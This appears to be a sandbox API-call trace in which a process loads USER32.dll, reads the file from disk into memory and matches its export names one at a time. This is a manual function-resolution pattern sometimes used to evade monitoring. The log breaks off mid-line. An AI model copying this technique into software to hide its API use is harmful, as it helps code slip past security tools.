lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0123.170] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0123.170] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0123.170] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0123.170] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0123.170] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0123.171] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0123.171] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0123.172] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0123.172] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0123.173] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0123.173] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0123.173] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0123.173] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0123.174] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0123.192] GetProcessHeap () returned 0x480000 [0123.192] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cb5030 | out: hHeap=0x480000) returned 1 [0123.192] GetProcessHeap () returned 0x480000 [0123.192] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499340 [0123.192] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0123.193] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0123.193] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0123.193] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0123.193] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0123.194] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0123.194] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0123.194] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0123.194] GetProcessHeap () returned 0x480000 [0123.194] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1555b8) returned 0x4070040 [0123.198] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0123.198] ReadFile (in: hFile=0x17c, lpBuffer=0x4070040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4070040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0123.479] CloseHandle (hObject=0x17c) returned 1 [0123.479] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0123.479] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0123.479] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0123.479] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0123.479] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0123.479] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0123.479] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0123.479] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0123.479] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0123.479] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0123.480] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0123.480] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0123.480] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0123.480] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0123.480] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0123.480] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0123.480] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0123.480] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0123.480] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0123.480] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0123.480] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0123.480] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0123.480] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0123.481] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0123.481] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0123.481] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0123.482] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0123.482] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0123.482] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0123.483] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0123.483] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0123.484] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0123.484] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0123.484] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0123.484] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0123.485] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0123.485] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0123.485] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0123.485] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0123.485] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0123.485] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0123.485] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0123.485] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0123.485] lstrcmpA 